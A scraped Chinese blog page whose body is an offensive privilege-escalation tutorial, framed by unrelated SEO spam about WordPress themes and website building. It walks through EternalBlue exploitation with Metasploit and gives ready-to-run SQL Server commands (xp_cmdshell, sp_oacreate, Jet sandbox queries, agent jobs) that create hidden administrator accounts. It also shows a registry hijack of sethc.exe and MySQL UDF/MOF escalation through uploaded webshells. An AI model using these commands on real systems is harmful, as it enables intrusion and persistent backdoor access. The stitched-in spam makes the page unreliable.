当前位置: 首页 > news >正文

wordpress 美食主题/百度搜索优化建议

wordpress 美食主题,百度搜索优化建议,有哪些做动图的网站,网页源代码复制粘贴提取文字提权:防护措施:在Windows中安装apache后,要单独为其创建一个账户,只给启动服务的权限,防止攻击者通过apache直接获得system权限,Linux同理。IIS中网站为什么使用匿名登录?任何windows服务都会对…

提权:

防护措施:

在Windows中安装apache后,要单独为其创建一个账户,只给启动服务的权限,防止攻击者通过apache直接获得system权限,Linux同理。

IIS中网站为什么使用匿名登录?

任何windows服务都会对应一个账号来运行:

8f058fe9be0ae1ce3c706e89d7a5ef39.png

Windows安装IIS后,在计算机管理---系统工具---本地用户和组---用户中都会有IUSER和IWAM两个用户,IUSER可以匿名访问内置账户。

6edb7e8b8219fdccd5dd7e8f9f1ef711.png

打开IIS中网站的属性,目录安全性---身份验证和访问控制---编辑。

689508142ae3dc741c6a96e6390710a8.png

b0f7d727a9b9dbbd9dfdf6bbe561e95f.png

匿名访问可以让陌生人访问本网站时不用输入用户名和密码,默认以IUSER的账户登录。

为什么要提权?

上传大马后,在shell中的cmd.exe中执行命令时,往往需要勾选如图红框所示选项才能成功执行。

50c1242204a5a0553ddc419c4d43eacc.png

如果cmd.exe不能执行命令,可能是来宾没有权限执行目标主机系统命令中的cmd.exe。

输入whoami,发现是验证的网络服务权限,只能查看用户,不能创建或删除用户,所以我们就需要提权操作。

1bbb793e32e43b976e543d170cbdb246.png

提权结果:

Windows:user>>>system

Linux:user>>>root

提权分类:

远程提权-远程代码执行RCE

远程可直接利用,例如ms17-010

本地提权-本地代码执行LCE

一般借助webshell

远程利用漏洞攻击提权:

准备:

kali虚拟机ISO镜像 --装成虚拟机

metasploitable-linux-2.0.0漏洞靶机

metasploit教程:

https://blog.csdn.net/jiangliuzheng/article/details/50546783

打开kali虚拟机的终端,输入

msfconsole

成功启动metasploit。

124f82a642a5139cdca978f8be17444c.png

找到要利用的漏洞,输入

search ms17-010

6f811586f040ed65fbdf0a42717d24ad.png

选择其中的攻击脚本使用,输入

use exploit/windows/smb/ms17_010_eternalblue

输入info,查看攻击脚本帮助。

bd39268bea42a23efcb70c2ec47141d3.png

输入show options,查看当前攻击脚本配置。

1791886d06397f21a45e4f781a83136f.png

输入nmap 192.168.18.21,扫描目标主机开放端口有哪些。

0a7c3afd53e086ff105cbfd11747833c.png

输入exploit,成功拿到目标主机shell。

0a1d75559914d375cab33e1279b7da86.png

输入whoami,发现是system权限。

输入ipconfig,发现是目标主机的IP。

77d179daffaaac4a61231a5c9585f52c.png

利用远程溢出漏洞获取shell过程:

知道目标主机系统

知道目标主机系统存在哪些漏洞

知道目标主机溢出漏洞利用的端口号是否开启

使用metasploit脚本攻击平台获取shell

本地代码执行LCE提权:

操作系统本地RCE漏洞

第三方软件漏洞

数据库利用

基于系统漏洞本地提权过程:

9f927a3bab9eb96e3c8827b5c0c6280d.png

Windows系统在cmd中的快速检测漏洞编号脚本:

2003:

systeminfo>a.txt&(for %i in (KB952004 KB956572 KB970483 KB2160329 KB977165 KB2124261 KB2271195 KB2503665 KB2592799 KB2621440 KB2707511 KB2829361 KB2850851 KB2914368 KB3000061 KB3013455 KB3031432 KB3045171 KB3077657) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt

2003以上:

systeminfo>a.txt&(for %i in (KB3077657 KB3045171 KB2829361 KB3000061 KB2850851 KB2707511 KB970483 KB2124261 KB2271195) do @type a.txt|@find /i “%i”|| @echo %i Not Installed!)&del /f /q /a a.txt

1.操作系统本地REC漏洞(原理:利用大马或小马文件上传)

利用大马上传创建用户的exp文件,上传成功后记住上传的路径,在cmd下访问该文件,完成自动创建用户操作。

上传获取shell的exp文件,上传成功后记住上传的路径,在cmd下访问该文件后跟高权限命令,即可执行system权限操作。

2.数据库提权(原理:利用数据库的存储过程进行提权)

无论时SQL server还是MySQL,提权的前提都需要获得管理员账号和密码。

因为上传大马或者一句话后,数据库连接管理中都会需要配置相应的管理员账号和密码才能连接数据库。

SQL server

一、利用xp_cmdshell存储过程提权(调用数据库自带命令执行高权限语句)

1、提权命令:

exec xp_cmdshell 'net user aaa aaa /add && net localgroup administrators aaa /add' --执行系统命令可获得高权限

2、常见问题与解决方法如下:

select count(*)from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell' ; --判断xp_cmdshell是否存在(返回1,存在;0,不存在)

and 1=(select count(*)from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell'); --由此可构造注入语句。

EXEC sp_configure 'show advanced options', 1 ;

Reconfigure;

EXEC sp_configure 'xp_cmdshell', 1 ; --开启xp_cmdshell,如果关闭,需要将这里的1改为“0”

RECONFIGURE ; --以上命令开启用xp_cmdshell

exec sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'; --通过系统默认的xplog70.dll恢复存储过程

exec sp_addextendedproc 'xp_cmdshell','C:\ xplog70.dll';--通过自己上传的xplog70.dll恢复存储过程

二、利用sp_oacreate和sp_oamethod提权存储过程提权(调用数据库自带命令执行高权限语句)

declare @cmd INT;

exec sp_oacreate 'wscript.shell',@cmd output;

exec sp_oamethod @cmd,'run',null,'net user hack hack /add','0','true';

exec sp_oacreate 'wscript.shell',@cmd output;

exec sp_oamethod @cmd,'run',null,'net localgroup administrators hack /add','0','true'; --利用其提权创建账户(语句需要同时执行)

常见问题与解决方法如下:

1、存储过程未启用

exec sp_configure 'show advanced options', 1;

RECONFIGURE;

exec sp_configure 'Ole Automation Procedures',1;

RECONFIGURE; --以上命令同时执行,开启sp-ascreate。默认2005中是禁用的。2000中默认开启。

2、存储过程被删除

dbcc addextendedproc ("sp_oacreate","odsole70.dll");--恢复存储过程

三、利用沙盒提权(沙盒模式默认禁止使用shell和kill等高权限命令,关闭沙盒模式再执行)

1、用xp_regwrite这个存储过程对注册表进行写操作,关掉沙盒模式。SQL语句为:

EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0

2、提权命令:添加一个帐号和密码都为sql$的帐号,同时加入管理员组

Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user sql$ 123 /add")');

Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators sql$ /add")');

3、常见问题与解决办法

注意:SQL2005默认是禁用Ad Hoc Distributed,执行命令时,会提示错误。需要开启

exec sp_configure 'show advanced options',1 ;

reconfigure ;

exec sp_configure 'Ad Hoc Distributed Queries',1 ;

reconfigure;

四、利用自动化任务JOB提权(在作业任务中执行高权限语句)

1、启动sqlagent服务

exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'

2、创建任务X,这里x为任务名称,并执行命令,命令执行后的结果,将返回给文本文档q.txt

use msdb

exec sp_delete_job null,'x'

exec sp_add_job 'x'

exec sp_add_jobstep null,'x',null,'1','cmdexec','cmd /c "net user hack1 hack1 /add &net localgroup administrators hack1 /add>c:/q.txt"'

exec sp_add_jobserver null,'x',@@servername

exec sp_start_job 'x';

五、利用xp_regwrite函数进行映像劫持提权

1、利用regwrite函数修改注册表,起到劫持作用

EXEC master..xp_regwrite @rootkey='HKEY_LOCAL_MACHINE',@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.EXE',@value_name='Debugger',@type='REG_SZ',@value='c:\windows\system32\cmd.exe'

2、检查是否劫持成功

exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'

MySQL

一、UDF提权

利用webshell上传UDF.php,访问该提权工具,输入信息后点击提交。

855620bdcc39c5e33c2a4ae744ca8f47.png

1.导出udf.dll

41c6e391cfbd1fe15c346705524c20b7.png

2.基于udf.dll创建自定义函数cmdshell

b6569f783948e8e8eb347145fc9ca725.png

3.利用自定义函数,执行高权限cmd命令

6ca58c120815f0f4133fc79de73ca116.png

注意:

Linux中MySQL默认低权限。

二、mof文件提权

原理:

be90728f1880ba53cd5fa27fbfd4eace.png

新建mof文件上传到mof目录下。

c3975a6f071411798d6dfeef62092a68.png

提权过程:

c4f0b92fa9c82c7217b0178b530c1dd1.png

利用工具远程管理数据库:

1.SQL TOOLS远程连接目标主机SQL server数据库:

0a1d50204dc74a826afd3e17d06bee92.png

2.河马mysql弱口令利用工具远程连接目标主机MySQL数据库:

仅支持5.0之前版本

af69459e5ca4c0ecd5e01d39854cc866.png

3.如果知道数据库弱口令的话,可以利用phpmyadmin远程图形化管理数据库。

3.第三方应用提权

http://www.lbrq.cn/news/1049689.html

相关文章:

  • 网站开发需要哪些工程师/百度广告投放价格表
  • 自己做黑彩网站/广告营销方式有哪几种
  • 用竹片做的网站/营销模式和营销策略
  • 电商网站管理系统模板下载/徐州做网站的公司
  • 做网站需要哪些东西和步骤/怎样有效的做网上宣传
  • 筑巢网站建设/全网营销是什么
  • 签约做网站模板/百度登录首页
  • 用pc做网站服务器为什么不如云主机/网站推广如何引流
  • 合肥网络公司网站建设/兰州seo快速优化报价
  • 柳州建设厅官方网站/搜狗搜索旧版本
  • 网站空间每年继费到哪交/免费招聘信息发布平台
  • adobe专门做网站的软件/爱战网关键词挖掘
  • 怎么做套板网站/品牌推广活动有哪些
  • sublime做网站/aso优化技巧大aso技巧
  • 网站开发网站制作/b站大全永不收费2023入口在哪
  • 小说网站建设方案书ppt/网站建设维护
  • 广州网站开发设计公司/核心关键词举例
  • 阳江企业网站建设/12345浏览器网址大全
  • 网站做跳转/seo免费浏览网站
  • 做网站导流/小江seo
  • 河北移动端网站建设/在线刷关键词网站排名
  • 建设一个网站大概多少钱/电商运营自学网站
  • 网站导航网站建设多少钱/百度销售推广
  • 怎么做出有品牌感的网站/百度排名查询
  • 网站是哪个公司做的好处/百度投广告怎么收费
  • 企业网站建设联系电话/北京排名seo
  • 新闻网站建设规划书/5118站长工具箱
  • 杭州湾新区开发建设公司网站/百度一下首页登录入口
  • 网站建设中企动力公司/百度下载安装2021
  • 创办一个网站的费用/免费建立自己的网站
  • Spark学习(Pyspark)
  • WPFC#超市管理系统(5)商品布局、顾客登录、商品下单
  • AtCoder Beginner Contest 418
  • Web自动化技术选择
  • 光伏面板损伤检出率↑91%!陌讯多模态识别算法在无人机巡检的落地实践
  • Chrome DevTools Protocol 开启协议监视器